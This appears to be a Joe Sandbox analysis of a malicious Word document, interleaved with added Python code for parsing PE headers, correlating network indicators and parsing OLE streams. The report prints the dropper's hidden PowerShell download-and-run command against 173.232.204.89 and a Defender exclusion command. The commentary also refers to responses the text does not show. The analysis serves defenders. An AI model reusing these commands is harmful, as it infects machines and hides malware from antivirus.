07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7
                    Source: global traffic | HTTP traffic detected: GET /taskmg.exe HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 173.232.204.89
                        Connection: Keep-Alive
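The two 200 OK responses above hand the analyst the first kilobyte of taskmg.exe together with the server's own metadata about it, and the two can be checked against each other before either is trusted. The following Python is an added example, not part of the Joe Sandbox report: HEADERS and DATA_RAW are copied from the first captured response (DATA_RAW stops at file offset 0x250, the end of the CLR header; the rest of the dump is left out). It parses the DOS, COFF and optional headers, the section table and the CLR header, then confirms that the nginx ETag (hex mtime, hex size) agrees with Last-Modified and Content-Length and that the PE TimeDateStamp is the same second as Last-Modified.

```python
"""Parse the PE header bytes captured in the HTTP response for taskmg.exe and
cross-check them against the response headers.
Added example, not part of the Joe Sandbox report. HEADERS and DATA_RAW are
copied from the report's first captured response; DATA_RAW stops at file
offset 0x250 (end of the CLR header), the rest of the dump is omitted."""
import calendar
import struct
from email.utils import parsedate

HEADERS = {
    "Server": "nginx/1.19.9",
    "Date": "Thu, 25 Nov 2021 17:14:54 GMT",
    "Content-Type": "application/octet-stream",
    "Content-Length": "777216",
    "Last-Modified": "Thu, 25 Nov 2021 03:51:30 GMT",
    "ETag": '"619f0842-bdc00"',
}

DATA_RAW = bytes.fromhex(
    "4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000"  # 0x000 DOS header
    "00000000 00000000 00000000 00000000 00000000 00000000 00000000 80000000"  # 0x020 e_lfanew = 0x80
    "0e1fba0e 00b409cd 21b8014c cd215468 69732070 726f6772 616d2063 616e6e6f"  # 0x040 DOS stub
    "74206265 2072756e 20696e20 444f5320 6d6f6465 2e0d0d0a 24000000 00000000"  # 0x060
    "50450000 4c010300 42089f61 00000000 00000000 e0000201 0b013000 00d00b00"  # 0x080 PE\0\0, COFF, optional header
    "000a0000 00000000 aeee0b00 00200000 00000c00 00004000 00200000 00020000"  # 0x0a0
    "04000000 00000000 04000000 00000000 00400c00 00020000 00000000 02004085"  # 0x0c0
    "00001000 00100000 00001000 00100000 00000000 10000000 00000000 00000000"  # 0x0e0 NumberOfRvaAndSizes = 16
    "5cee0b00 4f000000 00000c00 88060000 00000000 00000000 00000000 00000000"  # 0x100 data directories
    "00200c00 0c000000 00000000 00000000 00000000 00000000 00000000 00000000"  # 0x120
    "00000000 00000000 00000000 00000000 00000000 00000000 00200000 08000000"  # 0x140
    "00000000 00000000 08200000 48000000 00000000 00000000 2e746578 74000000"  # 0x160 CLR dir, then ".text"
    "0ccf0b00 00200000 00d00b00 00020000 00000000 00000000 00000000 20000060"  # 0x180
    "2e727372 63000000 88060000 00000c00 00080000 00d20b00 00000000 00000000"  # 0x1a0 ".rsrc"
    "00000000 40000040 2e72656c 6f630000 0c000000 00200c00 00020000 00da0b00"  # 0x1c0 ".reloc"
    "00000000 00000000 00000000 40000042 00000000 00000000 00000000 00000000"  # 0x1e0
    "90ee0b00 00000000 48000000 02000500 ac480100 a0210100 03000000 8c010006"  # 0x200 IAT, CLR header
    "4c6a0200 10840900 00000000 00000000 00000000 00000000 00000000 00000000"  # 0x220
    "00000000 00000000 00000000 00000000"                                       # 0x240
)

SECTION_FLAGS = {0x20: "IMAGE_SCN_CNT_CODE", 0x40: "IMAGE_SCN_CNT_INITIALIZED_DATA",
                 0x02000000: "IMAGE_SCN_MEM_DISCARDABLE", 0x20000000: "IMAGE_SCN_MEM_EXECUTE",
                 0x40000000: "IMAGE_SCN_MEM_READ", 0x80000000: "IMAGE_SCN_MEM_WRITE"}


def parse_pe(data):
    """COFF and optional-header fields plus the section table of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic, linker_major, linker_minor = struct.unpack_from("<HBB", data, opt)
    if magic != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(n_dirs)]
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "va": va, "vsize": vsize,
                         "raw": rawptr, "rawsize": rawsize, "flags": flags,
                         "flag_names": [n for bit, n in SECTION_FLAGS.items() if flags & bit]})
    return {"machine": machine, "timestamp": stamp, "linker": (linker_major, linker_minor),
            "entry_point": struct.unpack_from("<I", data, opt + 16)[0],
            "image_base": struct.unpack_from("<I", data, opt + 28)[0],
            "clr_dir": dirs[14] if n_dirs > 14 else (0, 0), "sections": sections}


def rva_to_offset(rva, sections):
    """Map an RVA to a file offset through the section table."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["raw"]
    raise ValueError("RVA %#x is not inside any section" % rva)


def parse_clr_header(data, pe):
    """IMAGE_COR20_HEADER; present only for .NET images."""
    rva, size = pe["clr_dir"]
    if size == 0:
        return None
    cb, major, minor, md_rva, md_size, flags, entry = struct.unpack_from(
        "<IHHIIII", data, rva_to_offset(rva, pe["sections"]))
    return {"cb": cb, "runtime": (major, minor), "metadata": (md_rva, md_size),
            "flags": flags, "entry_point_token": entry}


def cross_check(headers, data):
    """nginx ETags are "<mtime hex>-<size hex>"; compare every source of the same fact."""
    mtime_hex, size_hex = headers["ETag"].strip('"').split("-")
    last_modified = calendar.timegm(parsedate(headers["Last-Modified"]))
    pe = parse_pe(data)
    return {"etag_mtime_is_last_modified": int(mtime_hex, 16) == last_modified,
            "etag_size_is_content_length": int(size_hex, 16) == int(headers["Content-Length"]),
            "pe_timestamp_is_last_modified": pe["timestamp"] == last_modified,
            "is_dotnet": pe["clr_dir"][1] != 0}
```

All four checks pass on the captured data. The section table reproduces what the report's static PE lines say about .text (code, execute, read), the CLR directory at RVA 0x2008 marks the file as a .NET assembly (which is why the report can list decompiled C# for it), and the fact that the compile timestamp (0x619f0842) coincides with the server's mtime to the second is something to record rather than to read as a genuine build time.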
                    Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
                    Source: Joe Sandbox View | IP Address: 208.91.198.143
                    Source: Joe Sandbox View | IP Address: 208.91.199.225
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 208.91.199.224:587
                    Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 208.91.199.225:587
                    Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 208.91.199.223:587
                    Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 208.91.198.143:587
                    Source: powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmp | String found in binary or memory: httP://173.232
                    Source: powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmp | String found in binary or memory: httP://173.232.2
                    Source: powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmp | String found in binary or memory: httP://173.232.204.89/t
                    Source: powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmp | String found in binary or memory: httP://173.232.204.89/taskmg.
                    Source: powershell.exe, 00000005.00000002.418266539.0000000000160000.00000004.00000020.sdmp, powershell.exe, 00000005.00000002.418277171.000000000019E000.00000004.00000020.sdmp, powershell.exe, 00000005.00000002.419023647.0000000002C91000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.418378144.00000000004A4000.00000004.00000040.sdmp | String found in binary or memory: httP://173.232.204.89/taskmg.exe
                    Source: powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmp | String found in binary or memory: httP://173.232.204.89/taskmg.exePE
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: powershell.exe, 00000003.00000002.430015540.0000000003749000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp | String found in binary or memory: http://173.232.204.89
                    Source: powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp | String found in binary or memory: http://173.232.204.89/taskmg.exe
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
                    Source: taskmg.exe, 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp | String found in binary or memory: http://EW9kaPSTVWDzFNsliGsC.org
                    Source: taskmg.exe, 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp | String found in binary or memory: http://EW9kaPSTVWDzFNsliGsC.org(Zgt
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp | String found in binary or memory: http://GwvXXB.com
                    Source: powershell.exe, 00000005.00000002.418277171.000000000019E000.00000004.00000020.sdmp | String found in binary or memory: http://java.co_w
                    Source: powershell.exe, 00000003.00000002.423981506.000000000043E000.00000004.00000020.sdmp | String found in binary or memory: http://java.cohe
                    Source: powershell.exe, 00000003.00000002.424369467.0000000002510000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.418546129.0000000002210000.00000002.00020000.sdmp, taskmg.exe, 00000009.00000002.447397125.00000000057A0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: schtasks.exe, 0000000C.00000002.437567787.0000000000740000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
                    Source: powershell.exe, 00000003.00000002.424369467.0000000002510000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.418546129.0000000002210000.00000002.00020000.sdmp, taskmg.exe, 00000009.00000002.447397125.00000000057A0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
                    Source: powershell.exe, 00000003.00000002.423981506.000000000043E000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerv
                    Source: taskmg.exe, 0000000E.00000002.705002661.00000000027F0000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                    Source: taskmg.exe, 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, taskmg.exe, 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6B5678D1-0902-45B5-A7D8-811025AE74F7}.tmp
                    Source: unknown | DNS traffic detected: queries for: us2.smtp.mailhostbox.com
                    Source: global traffic | HTTP traffic detected: GET /taskmg.exe HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 173.232.204.89
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /taskmg.exe HTTP/1.1
                        Host: 173.232.204.89
                        Connection: Keep-Alive
                    Source: unknown | TCP traffic detected without corresponding DNS query: 173.232.204.89 (this line is repeated 50 times in the report)
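The network lines above say three separate things: the host talked to 173.232.204.89 repeatedly without ever resolving a name for it, the one name it did look up was an SMTP submission host, and the port 587 connections went to four different addresses while the only HTTP request carried a bare IP in its Host header. Each of those is a detection rule in its own right, and the 50-fold repetition is what a pipeline has to collapse into a count. The Python below is an added example, not part of the report: it replays a constructed timeline built from the report's IPs, ports, URL and DNS name through the three rules and aggregates the hits. The process names, the DNS answers for us2.smtp.mailhostbox.com and the allowlist of mail clients are assumptions; the report shows neither which process opened each connection nor what the name resolved to.

```python
"""Correlate the report's network indicators (DNS query, raw-IP HTTP download,
SMTP connections, TCP to an IP no query resolved) as detection rules, then
collapse repeats into counts.
Added example, not part of the Joe Sandbox report. EVENTS is a constructed
timeline built from the report's IPs, ports, URL and DNS name; process names,
DNS answers and the mail-client allowlist are assumptions."""
import ipaddress
from collections import Counter, namedtuple

MAIL_PORTS = {25, 465, 587}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}  # assumed allowlist of processes allowed to speak SMTP

Finding = namedtuple("Finding", "t rule proc dst dport")

EVENTS = [
    # assumed answers: the report only shows the query for this name
    {"t": 0, "kind": "dns", "name": "us2.smtp.mailhostbox.com",
     "answers": ["208.91.199.224", "208.91.199.225", "208.91.199.223", "208.91.198.143"]},
    # GET /taskmg.exe with a literal IP in the Host header, captured twice in the report
    {"t": 1, "kind": "http", "proc": "powershell.exe", "dst": "173.232.204.89", "dport": 80,
     "host": "173.232.204.89", "path": "/taskmg.exe"},
    {"t": 6, "kind": "http", "proc": "powershell.exe", "dst": "173.232.204.89", "dport": 80,
     "host": "173.232.204.89", "path": "/taskmg.exe"},
    # submission-port connections to the four addresses the report lists (process name assumed)
    {"t": 40, "kind": "tcp", "proc": "taskmg.exe", "dst": "208.91.199.224", "dport": 587},
    {"t": 41, "kind": "tcp", "proc": "taskmg.exe", "dst": "208.91.199.225", "dport": 587},
    {"t": 42, "kind": "tcp", "proc": "taskmg.exe", "dst": "208.91.199.223", "dport": 587},
    {"t": 43, "kind": "tcp", "proc": "taskmg.exe", "dst": "208.91.198.143", "dport": 587},
    # a later connection back to the download host, still with no DNS query before it
    {"t": 90, "kind": "tcp", "proc": "taskmg.exe", "dst": "173.232.204.89", "dport": 80},
]


def is_raw_ip(host):
    """True when an HTTP Host header carries a literal IP instead of a name."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0].strip("[]"))
        return True
    except ValueError:
        return False


def correlate(events, dns_window=300):
    """Apply the three rules in time order; dns_window bounds how old a DNS answer may be."""
    resolved = {}  # ip -> time of the most recent answer that contained it
    findings = []
    for e in sorted(events, key=lambda ev: ev["t"]):
        if e["kind"] == "dns":
            for ip in e["answers"]:
                resolved[ip] = e["t"]
            continue
        seen_at = resolved.get(e["dst"])
        if seen_at is None or e["t"] - seen_at > dns_window:
            findings.append(Finding(e["t"], "tcp_without_dns", e["proc"], e["dst"], e["dport"]))
        if e["kind"] == "http" and is_raw_ip(e["host"]):
            findings.append(Finding(e["t"], "http_host_is_raw_ip", e["proc"], e["dst"], e["dport"]))
        if e["dport"] in MAIL_PORTS and e["proc"].lower() not in MAIL_CLIENTS:
            findings.append(Finding(e["t"], "smtp_from_non_mail_client", e["proc"], e["dst"], e["dport"]))
    return findings


def summarize(findings):
    """Collapse repeated hits into (rule, proc, dst, dport) -> count, as a SIEM would."""
    return Counter((f.rule, f.proc, f.dst, f.dport) for f in findings)


if __name__ == "__main__":
    for key, n in sorted(summarize(correlate(EVENTS)).items()):
        print("%-28s %-16s %s:%d  x%d" % (key + (n,)))
```

The dns_window parameter matters in practice: sandbox captures are short, but on a real endpoint a connection to an address resolved an hour earlier is just a cached answer, so the rule should tolerate a window rather than demand a query immediately before every connection.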

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    Installs a global keyboard hook
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\taskmg.exe
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Window created: window name: CLIPBRDWNDCLASS

                    System Summary:

                    Document contains OLE streams with names of living off the land binaries
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.dr | Stream path '_1699369208/\x1Ole10Native' : T}....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaDw\abdtfhghgeghDp..ScT.|... [the remainder of the dump is a long run of non-printable bytes, shown as dots in the report]
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.dr | Stream path '_1699369236/\x1Ole10Native' : D~....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..|... [the remainder of the dump is a long run of non-printable bytes, shown as dots in the report]
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\taskmg.exe
                    .NET source code contains very large array initializations
                    Source: 14.0.taskmg.exe.400000.13.unpack, <PrivateImplementationDetails>{7D8661CA-2C0A-4493-AE88-5ADC1243DCCA}/F57C54F7-A459-4722-B554-98E451E63B57.cs | Large array initialization: .cctor: array initializer size 12046
                    Source: 14.0.taskmg.exe.400000.9.unpack, <PrivateImplementationDetails>{7D8661CA-2C0A-4493-AE88-5ADC1243DCCA}/F57C54F7-A459-4722-B554-98E451E63B57.cs | Large array initialization: .cctor: array initializer size 12046
                    Source: 14.2.taskmg.exe.400000.0.unpack, <PrivateImplementationDetails>{7D8661CA-2C0A-4493-AE88-5ADC1243DCCA}/F57C54F7-A459-4722-B554-98E451E63B57.cs | Large array initialization: .cctor: array initializer size 12046
                    Source: 14.0.taskmg.exe.400000.11.unpack, <PrivateImplementationDetails>{7D8661CA-2C0A-4493-AE88-5ADC1243DCCA}/F57C54F7-A459-4722-B554-98E451E63B57.cs | Large array initialization: .cctor: array initializer size 12046
                    Microsoft Office creates scripting files
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Office process drops PE file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exe
                    Document contains a stream with embedded javascript code
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.dr | Stream path '_1699369208/\x1Ole10Native' : Found JS content: T}....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaDw\abdtfhghgeghDp..ScT.|... [non-printable bytes shown as dots in the report]
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.dr | Stream path '_1699369236/\x1Ole10Native' : Found JS content: D~....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..|... [non-printable bytes shown as dots in the report]
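Both Ole10Native dumps (here and under "Document contains OLE streams with names of living off the land binaries" above) follow the standard "Package" layout, and the bytes the report renders as dots between the strings are that format's fields: a total size, the constant 0x0002, the label, the original path, two uint32 values of which the second is the length of the temp path that follows (the ' ...' and '6...' visible in the dumps are 0x20 and 0x36, consistent with the two path lengths), then the payload size and the payload itself. The Python below is an added example, not part of the report and not the code of oletools, whose oleobj performs this extraction in practice (olefile enumerates the streams of the ~WRF compound file). It builds a constructed stream in that layout, parses it back, and applies the two checks the report's signatures imply: a script extension on the label and scriptlet markup in the payload. The label and paths are the report's rendering with the non-printable characters it shows as dots dropped, the payload is a placeholder rather than the real embedded file, and the first of the two uint32 values is an assumed constant, since the report shows those bytes only as dots.

```python
"""Build and parse an Ole10Native ("Package") stream like the two the report
found in ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.
Added example, not part of the Joe Sandbox report and not oletools' code.
STREAM is constructed: label and paths follow the report's rendering minus
the non-printable characters it shows as dots; PAYLOAD is a placeholder."""
import struct

SCRIPT_EXTENSIONS = (".sct", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1")

LABEL = "abdtfhgXgeghDp.ScT"
SRC_PATH = r"C:\nsdsTggH\abdtfhgXGeghDp.ScT"
TEMP_PATH = r"C:\CbkepaDw\abdtfhghgeghDp.ScT"
PAYLOAD = (b'<?XML version="1.0"?>\r\n<scriptlet>\r\n<script language="JScript"><![CDATA[\r\n'
           b'/* constructed placeholder, not the sample payload */\r\n]]></script>\r\n</scriptlet>\r\n')


def build_ole10native(label, src_path, temp_path, payload, unknown=0x00030000):
    """Serialise a Package stream; `unknown` is an assumed value for the first uint32."""
    temp = temp_path.encode("latin-1") + b"\0"
    body = (struct.pack("<H", 2)
            + label.encode("latin-1") + b"\0"
            + src_path.encode("latin-1") + b"\0"
            + struct.pack("<II", unknown, len(temp))
            + temp
            + struct.pack("<I", len(payload)) + payload)
    return struct.pack("<I", len(body)) + body


STREAM = build_ole10native(LABEL, SRC_PATH, TEMP_PATH, PAYLOAD)


def _cstring(buf, off):
    """Read a NUL-terminated ANSI string starting at `off`; return (text, offset after NUL)."""
    end = buf.find(b"\0", off)
    if end < 0:
        raise ValueError("unterminated string at offset %d" % off)
    return buf[off:end].decode("latin-1"), end + 1


def looks_like_scriptlet(payload):
    """Windows Script Component (.sct) files are XML carrying <scriptlet> and <script> tags."""
    head = payload[:4096].lower()
    return b"<scriptlet" in head or (b"<script" in head and b"language=" in head)


def parse_ole10native(stream):
    """Parse a Package stream, checking every length field against the bytes present."""
    try:
        total, flags = struct.unpack_from("<IH", stream, 0)
        off = 6
        label, off = _cstring(stream, off)
        src_path, off = _cstring(stream, off)
        unknown, temp_len = struct.unpack_from("<II", stream, off)
        off += 8
        temp_path, end = _cstring(stream, off)
        if end - off != temp_len:
            raise ValueError("temp path length field %d disagrees with string (%d)" % (temp_len, end - off))
        data_len = struct.unpack_from("<I", stream, end)[0]
        off = end + 4
    except struct.error as exc:
        raise ValueError("stream truncated inside the header: %s" % exc)
    payload = stream[off:off + data_len]
    if len(payload) != data_len:
        raise ValueError("payload truncated: header says %d bytes, %d present" % (data_len, len(payload)))
    return {
        "flags": flags, "label": label, "src_path": src_path, "unknown": unknown,
        "temp_path": temp_path, "payload": payload,
        "size_field_consistent": total == len(stream) - 4,
        "script_extension": label.lower().endswith(SCRIPT_EXTENSIONS),
        "looks_like_scriptlet": looks_like_scriptlet(payload),
    }
```

The temp path is the most useful field for a responder: it is where the object was last written on the machine that authored or re-saved the document (here C:\CbkepaDw\ in the first stream and the Word temp directory in the second), which is why the report's "Microsoft Office creates scripting files" line shows the same name landing in %TEMP% on the sandbox.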
                    Found suspicious RTF objects
                    Source: abdtfhgXgeghDp.ScT | Static RTF information: Object: 0 Offset: 000007DAh abdtfhgXgeghDp.ScT
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.dr | OLE indicator application name: unknown
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 9_2_012DA2A9
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 9_2_002B4AE0
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 9_2_002B5920
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 9_2_002B5910
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 9_2_002B5B70
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 9_2_012DA035
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_012DA2A9
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_005865D8
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_005859C0
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00585D08
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00582297
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_007228F0
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00721A90
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00727915
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00720048
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00722008
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00720898
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00720748
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00C40048
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00C48858
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00C43430
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00C4F320
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00C4C288
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_012DA035
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Memory allocated: 76F90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Memory allocated: 76E90000 page execute and read and write
                    Source: 00000003.00000002.423965866.0000000000400000.00000004.00000020.sdmp, type: MEMORY | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: 00000005.00000002.418266539.0000000000160000.00000004.00000020.sdmp, type: MEMORY | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.dr | OLE indicator has summary info: false
                    Source: taskmg[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: taskmg.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: gZfDBpJYZ.exe.9.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$confirm The Details.doc
                    Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winDOC@21/27@9/5
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.dr | OLE document summary: title field not present or empty
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.dr | OLE document summary: author field not present or empty
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.dr | OLE document summary: edited time not present or 0
                    Source: Reconfirm The Details.doc | ReversingLabs: Detection: 29%
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\taskmg.exe "C:\Users\user\AppData\Roaming\taskmg.exe"
Source: C:\Users\user\AppData\Roaming\taskmg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
